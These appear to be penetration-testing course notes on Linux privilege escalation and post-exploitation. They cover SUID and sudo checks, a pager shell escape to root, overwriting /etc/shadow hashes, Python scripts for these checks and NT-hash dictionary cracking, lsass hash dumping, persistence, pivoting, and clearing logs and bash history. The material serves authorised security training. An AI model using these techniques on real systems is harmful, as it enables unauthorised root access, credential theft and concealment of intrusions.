# 5.2 - Linux Privilege Escalation

### Linux Privilege Escalation <a href="#linux-privilege-escalation" id="linux-privilege-escalation"></a>

While web vulnerabilities tend to repeat themselves, privilege escalation is hard to reduce to a complete list: the available paths depend on the specific configuration of the target machine. Still, some attacks are common enough to deserve study. Some (not all) of these techniques are listed below:

* [Kernel exploitation](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.1-kernel-exploitation.md)
* PATH exploitation
* [SUID binaries exploitations](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md) (<https://gtfobins.github.io/>)
* [Weak file permissions](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md)
* [cronjob enumeration](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.3-cronjobs.md) (<https://github.com/DominicBreuker/pspy>)
* [sudo -l exploitation](/ecpptv3-ptp-notes/readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md)
* wildcard expansion

## Tools

As we have seen, there are tools that help us in this process:

### LinEnum

Privesc vulnerabilities can be identified automatically using the [LinEnum](https://github.com/rebootuser/LinEnum) tool.

* The labs below focus on **manual** Linux privilege escalation techniques instead
* Linux file permissions matter for most of them

> 🔬 Check
>
> * ​[Linux Privesc Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-privesc)​
> * ​[Linux Post Exploitation - Metasploit](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/3-metasploit/linux-post-msf)

The first command lists regular files (not symlinks) that are world-writable; the second lists SUID binaries owned by root. Redirect stderr so permission errors from unreadable directories do not drown the results.

```bash
find / -not -type l -perm -o+w 2>/dev/null                     # world-writable files, symlinks excluded
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null  # SUID binaries owned by root
```

If nothing anomalous turns up, look for misconfigured sudo rules. Check the current user's sudo capabilities:

```bash
sudo -l
(root) NOPASSWD: /usr/bin/man   # the user may run man as root without a password
```

The entry shows that `man` can be run with sudo without providing a password. `man` displays pages through a pager that supports shell escapes, so run it and launch /bin/bash from the pager prompt:

```bash
sudo man ls   # opens the page in the pager, running as root
!/bin/bash    # shell escape from the pager: spawns a root shell
```

The resulting shell runs as root; `id` confirms the escalation.

Next, check the permissions on /etc/shadow. The file should be readable only by root: if it is world-readable its hashes can be read (and cracked offline), and if it is world-writable it can be modified directly.

```bash
ls -l /etc/shadow   # expected: -rw-r----- root shadow
cat /etc/shadow
```

If root's password field is empty, or the file is writable, inserting the hash of a known password into root's entry allows `su root` with that password. Generate the hash with openssl (`-1` selects MD5-crypt, producing a `$1$` entry):

```bash
openssl passwd -1 -salt abc password   # MD5-crypt hash of "password" with salt "abc"
# paste the output into the second field of root's line in /etc/shadow, then: su root
```
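The checks walked through above, collected into one script, as an added example that is not part of the original notes. It runs the world-writable and SUID scans, parses `sudo -l` output for NOPASSWD entries, and inspects and rewrites a shadow-format file. Everything it works on is constructed for the demo: the directory tree (a stand-in for `/`, with one world-writable file, one SUID file owned by the current user rather than root, and a symlink that must be skipped), the `sudo -l` text, the shadow lines, and the `$1$abc$PLACEHOLDER` string that stands in for the real openssl output.

```python
"""Added example (not from the original notes): the manual checks above as Python
functions, run against a constructed tree. On a target, pass "/" and the real data."""
import os
import re
import shutil
import stat
import tempfile

# Constructed `sudo -l` output mirroring the entry quoted in the notes.
SAMPLE_SUDO_L = """User student may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/man
    (ALL : ALL) /usr/bin/apt-get
"""
# Constructed shadow file, nine colon-separated fields per line: root has an EMPTY
# hash field, daemon is locked (*), student has a made-up SHA-512 crypt hash.
SAMPLE_SHADOW = ("root::19000:0:99999:7:::\n"
                 "daemon:*:19000:0:99999:7:::\n"
                 "student:$6$salt$constructedhash:19000:0:99999:7:::\n")
# "(run-as) [TAG: ...] NOPASSWD: cmd1, cmd2"
NOPASSWD_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?:[A-Z]+:\s*)*NOPASSWD:\s*(?P<cmds>.+)$")

def _entries(root):
    """(path, lstat) for all names os.walk lists as files; symlinks are included,
    so callers filter on S_ISREG, which is what find's -not -type l does."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            yield path, os.lstat(path)

def find_world_writable(root: str) -> list[str]:
    """find / -not -type l -perm -o+w : regular files writable by 'other'."""
    return sorted(p for p, st in _entries(root)
                  if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH)

def find_suid(root: str, owner_uid: int = 0) -> list[str]:
    """find / -user root -perm -4000 : SUID regular files owned by owner_uid."""
    return sorted(p for p, st in _entries(root) if stat.S_ISREG(st.st_mode)
                  and st.st_mode & stat.S_ISUID and st.st_uid == owner_uid)

def parse_nopasswd(sudo_l_output: str) -> list[tuple[str, str]]:
    """(run-as user, command) for every NOPASSWD command in `sudo -l` output."""
    found = []
    for line in sudo_l_output.splitlines():
        m = NOPASSWD_RE.match(line)
        if m:
            found += [(m["runas"].strip(), c.strip()) for c in m["cmds"].split(",")]
    return found

def accounts_without_password(shadow_text: str) -> list[str]:
    """Users whose hash field is empty (no password needed), unlike '!' or '*' (locked)."""
    rows = (line.split(":") for line in shadow_text.splitlines() if line)
    return [row[0] for row in rows if row[1] == ""]

def set_shadow_hash(shadow_text: str, user: str, new_hash: str) -> str:
    """Shadow text with user's hash (field 2 of 9) replaced, other lines untouched.
    Write it back only if the file is writable and the engagement allows it."""
    out = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) == 9 and fields[0] == user:
            fields[1] = new_hash
        out.append(":".join(fields))
    return "\n".join(out) + "\n"

def build_demo_tree() -> str:
    """Constructed stand-in for '/': world-writable shadow, one SUID file, a symlink."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "usr", "bin"))
    os.makedirs(os.path.join(root, "etc"))
    shadow = os.path.join(root, "etc", "shadow")
    with open(shadow, "w") as fh:
        fh.write(SAMPLE_SHADOW)
    os.chmod(shadow, 0o666)                                   # the misconfiguration
    for name, mode in (("tool", 0o4755), ("plain", 0o755)):  # tool is SUID, plain is not
        path = os.path.join(root, "usr", "bin", name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    os.symlink(shadow, os.path.join(root, "etc", "shadow-link"))  # must not be listed
    return root

def run_demo() -> dict:
    """Run every check against the demo tree; paths come back relative to it."""
    root = build_demo_tree()
    try:
        rel = lambda paths: [os.path.relpath(p, root) for p in paths]
        return {"world_writable": rel(find_world_writable(root)),
                "suid": rel(find_suid(root, os.getuid())),  # demo files are ours, not root's
                "nopasswd": parse_nopasswd(SAMPLE_SUDO_L),
                "no_password": accounts_without_password(SAMPLE_SHADOW),
                # "$1$abc$PLACEHOLDER" stands in for the real openssl output
                "patched_root": set_shadow_hash(SAMPLE_SHADOW, "root",
                                                "$1$abc$PLACEHOLDER").splitlines()[0]}
    finally:
        shutil.rmtree(root)

if __name__ == "__main__":
    print(run_demo())
```

`accounts_without_password` distinguishes an empty hash field (login with no password) from `!` or `*`, which lock the account; `set_shadow_hash` only rebuilds lines with the full nine fields, so a truncated or foreign line is passed through untouched rather than corrupted.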

### LinPeas

LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)

{% embed url="<https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS>" %}

### Bashark

Another automated tool for identifying privilege escalation vulnerabilities on Linux.

{% embed url="<https://github.com/redcode-labs/Bashark/blob/master/bashark.sh>" %}

### Linux Exploit Suggester

In addition to the previous tools, [Linux Exploit Suggester ](https://github.com/The-Z-Labs/linux-exploit-suggester)suggests potential (mostly kernel) exploits for the target's kernel version and distribution.

It has to run on the victim machine, so download it there or transfer it (e.g. serve it from the attacker box with Python's [SimpleHTTPServer](https://docs.python.org/2/library/simplehttpserver.html), `python3 -m http.server` on Python 3).

{% embed url="<https://github.com/The-Z-Labs/linux-exploit-suggester>" %}

{% embed url="<https://www.kali.org/tools/linux-exploit-suggester/>" %}

### Linux Persistence

> ❗ **Persistence techniques and methods usually require administrative access and must follow the rules of engagement agreed with the customer.**

Persistence Techniques - MITRE ATT\&CK

<div align="left"><figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-e1c96da6aca06c8dfa53800abbbb690af27ac2e6%2Fimage-20230429130516537.png?alt=media" alt=""><figcaption></figcaption></figure></div>

Linux Server **`SSH`** service is typically enabled and an attacker can take advantage of it.

* If password login is disabled and ***key-based authentication*** is enabled, the attacker can copy a user's `SSH` private key and use it for future access.

Linux **`Cron`** is a service that repeatedly runs **cron jobs**: a job that executes a command at a fixed interval can be used to ensure persistent access to the target system.

> 🔬 Check the [Linux Persistence Labs](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/linux-persistence)​

### Dumping & Cracking Hashes <a href="#dumping-and-cracking-hashes" id="dumping-and-cracking-hashes"></a>

📝 Check the already covered Credential Dumping theory here:

* ​[Windows Credential Dumping](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/windows-attacks#windows-credential-dumping)​
* ​[Linux Credential Dumping](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/1-system-attack/linux-attacks#linux-credential-dumping)​

After the dumping process, hashes can be cracked using:

* ​[John The Ripper](https://github.com/openwall/john) - [Cheatsheet​](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/john-the-ripper)
* ​[Hashcat](https://hashcat.net/hashcat/) - [Cheatsheet](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/hashcat)

On a Windows host, the best option from a privilege escalation standpoint is to migrate into the **lsass** process: unlike explorer.exe, it upgrades the session to a 64-bit SYSTEM process and gives access to the credential material cached by lsass.

After migrating into lsass, use the `hashdump` utility.

It prints the local accounts with their hashes (usually NTLM hashes, in `user:RID:LM:NT:::` format).

Save the output to a file, e.g. hashes.txt.

The `kiwi` module, the Meterpreter implementation of Mimikatz, can also be loaded.

Now, with tools such as **John The Ripper**, the NT hashes can be cracked:

```bash
john --list=formats | grep NT
john --format=NT hashes.txt   # no wordlist given: John falls back to its default wordlist
# a custom wordlist such as rockyou can be used instead (decompress it first)
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=NT hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

Alternatively, use hashcat.

```bash
hashcat --help
hashcat -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt   # -a 0: dictionary attack, -m 1000: NTLM
# note: -a 3 is the mask (brute-force) mode and takes a mask, not a wordlist
```
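To make explicit what `john --format=NT` and `hashcat -m 1000` are doing, here is a minimal NT-hash dictionary cracker, added as an example that is not part of the original notes. The NT hash is MD4 over the UTF-16LE encoding of the password with no salt, so one MD4 per candidate can be compared against every dumped hash at once; MD4 is implemented inline because `hashlib.new("md4")` is often unavailable on OpenSSL 3 builds. The hashdump-style lines and the wordlist are constructed (the Administrator hash is the well-known NT hash of `password`, the Guest hash is the empty-password hash, and the `svc_backup` hash is generated from a password that is deliberately not in the wordlist).

```python
"""Added example (not from the original notes): a minimal NT-hash dictionary
cracker showing what john --format=NT / hashcat -m 1000 do. NT = MD4(UTF-16LE
password), unsalted, so one MD4 per candidate is compared with every dumped hash.
MD4 is implemented here because hashlib.new("md4") is often unavailable on
OpenSSL 3 builds. The hashdump-style lines and the wordlist are constructed."""
import struct

_MASK = 0xFFFFFFFF
_R3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

def _rotl(v: int, s: int) -> int:
    return ((v << s) | (v >> (32 - s))) & _MASK

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: pad to 56 mod 64, append the bit length LE, 3 rounds of 16 steps."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F, message words in order
            a, b, c, d = d, _rotl((a + f(b, c, d) + x[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & _MASK,
                                  (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H, words 0,8,4,12,2,10,...
            a, b, c, d = d, _rotl((a + h(b, c, d) + x[_R3_ORDER[i]] + 0x6ED9EBA1) & _MASK,
                                  (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & _MASK, (b0 + b) & _MASK, (c0 + c) & _MASK, (d0 + d) & _MASK
    return struct.pack("<4I", a0, b0, c0, d0)

def nt_hash(password: str) -> str:
    """NT hash as Windows stores it: MD4 over the UTF-16LE password, hex, no salt."""
    return md4(password.encode("utf-16le")).hex()

def parse_hashdump(text: str) -> dict[str, str]:
    """user -> NT hash from hashdump/pwdump lines 'user:rid:lm:nt:::'."""
    users = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and parts[3]:
            users[parts[0]] = parts[3].lower()
    return users

def crack_nt(dump_text: str, wordlist) -> dict[str, str]:
    """Dictionary attack: hash each candidate once and look it up against all dumped
    hashes (unsalted, so identical passwords share a hash). The empty password is
    tried first; its hash 31d6cfe0... is a common finding for unused accounts."""
    by_hash = {}
    for user, h in parse_hashdump(dump_text).items():
        by_hash.setdefault(h, []).append(user)
    cracked = {}
    for candidate in [""] + list(wordlist):
        for user in by_hash.pop(nt_hash(candidate), []):
            cracked[user] = candidate
        if not by_hash:  # everything cracked, stop early
            break
    return cracked

LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM hashing is disabled
# Constructed hashdump output: Administrator carries the well-known NT hash of
# "password", Guest the empty-password hash, svc_backup a hash generated from a
# password deliberately absent from the wordlist.
SAMPLE_DUMP = (f"Administrator:500:{LM_EMPTY}:8846f7eaee8fb117ad06bdd830b7586c:::\n"
               f"Guest:501:{LM_EMPTY}:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
               f"svc_backup:1001:{LM_EMPTY}:{nt_hash('Winter2024!')}:::\n")
SAMPLE_WORDLIST = ["123456", "password", "letmein", "Password1"]

if __name__ == "__main__":
    for user, pw in crack_nt(SAMPLE_DUMP, SAMPLE_WORDLIST).items():
        print(f"{user}: {pw!r}")
```

Because NT hashes are unsalted, the cracker indexes the dump by hash rather than by user: every candidate costs one MD4 regardless of how many accounts were dumped, and accounts sharing a password fall together. That is also why real tools reach billions of NT guesses per second on a GPU, and why a dumped hash can often be used directly (pass-the-hash) without cracking at all.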

With valid credentials in hand, access the host with Impacket's `psexec.py`, the Metasploit psexec module, or RDP (default port 3389) via xfreerdp:

```bash
xfreerdp /u:user /p:psw /v:IP
```

Logging in with legitimate credentials is a reliable way to keep access, since it relies on the target's own services rather than on dropped tooling.

> 🔬 Check the [Cracking Hashes Labs here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/crack-hashes)​

### ​[Pivoting](https://www.offsec.com/metasploit-unleashed/pivoting/)​ <a href="#pivoting" id="pivoting"></a>

🗒️ **Pivoting** is a post exploitation technique of using a compromised host, a **`foothold`** / **`plant`**, to attack other systems on its private internal network.

* Once gained access to the first target host, a forwarded port can be used to exploit other hosts on a private network unreachable from the attacker machine.

🗒️ **Port Forwarding** consists of rerouting/redirecting traffic from a target system's particular port to an attacker system's specific port.

* The service will be remotely available to the attacker system

> 🔬 Check the [Pivoting Lab here](https://blog.syselement.com/ine/courses/ejpt/hostnetwork-penetration-testing/5-post-exploit/pivoting)​

### Clearing Tracks <a href="#clearing-tracks" id="clearing-tracks"></a>

According to the rules of engagement, the pentester may be required to **clear any changes** made to the target systems during the exploitation and post-exploitation stages. A good practice is to keep all artifacts (payloads, scripts and binaries) in these folders, so they are easy to find and remove:

* Windows - **`C:\Temp`**
* Linux - **`/tmp`**

Metasploit Framework generates and stores a lot of artifacts on the target. *Some modules provide removal resource scripts.*

#### Windows <a href="#windows-1" id="windows-1"></a>

* Deleting the **Windows Event Log** can be a post-exploitation clearing technique.
  * ❗ **Avoid it during a regular penetration test: the data inside the Windows Event Log is important to the customer.**

**`Metasploit e.g.`**

```bash
cd C:\\
mkdir Temp
cd Temp
# Upload exploit into this C:\Temp directory
```

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-4a332647caa029d9ee70456e0de5acc408711ab7%2Fimage-20230429183522876.png?alt=media" alt=""><figcaption></figcaption></figure>

* Use the `Cleanup RC File`

```bash
# Cleanup Meterpreter RC File:
cat /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.0454/ATTACKDEFENSE_20230429.0454.rc
background
sessions 1
resource /root/.msf4/logs/persistence/ATTACKDEFENSE_20230429.1019/ATTACKDEFENSE_20230429.1019.rc
# Clear Windows Event Log from the Meterpreter session
# An attacker could potentially do this
clearev
```

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-dbfadbd978e871ba9dc1af7b8a3a0d582d16bd54%2Fimage-20230429183629443.png?alt=media" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-210a9d31c6f4cd147fc0bff5522b5ffe68afe312%2Fimage-20230429184104150.png?alt=media" alt=""><figcaption></figcaption></figure>

#### Linux <a href="#linux-1" id="linux-1"></a>

```bash
cd /tmp
# Upload exploit into this /tmp directory
```

* `bash` logs the commands used in a session (kept in memory and written to `~/.bash_history` when the shell exits)
* To clear the in-memory **`bash history`** of the current shell:

```bash
history -c
```

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-22e04c5eab9e6db54007153ef7a42e845d407108%2Fimage-20230429184656889.png?alt=media" alt=""><figcaption></figcaption></figure>

* The **`~/.bash_history`** file content can be deleted too:

```bash
cat /dev/null > ~/.bash_history
```

<figure><img src="https://2946054920-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-37a413a434fe4238e22aab604932449af90f750c%2Fimage-20230429184831730.png?alt=media" alt=""><figcaption></figcaption></figure>

* When using **Metasploit Framework** exploits, proceed manually to clear artifacts from the `/tmp` directory or other used directories.

## Cheatsheets for Pentesting

* [Windows Privilege Escalation Cheatsheet](https://dev-angelist.gitbook.io/windows-privilege-escalation/cheatsheet)
* [CRTP (Active Directory Notes) Cheatsheet](https://dev-angelist.gitbook.io/crtp-notes/crtp-cheat-sheet)

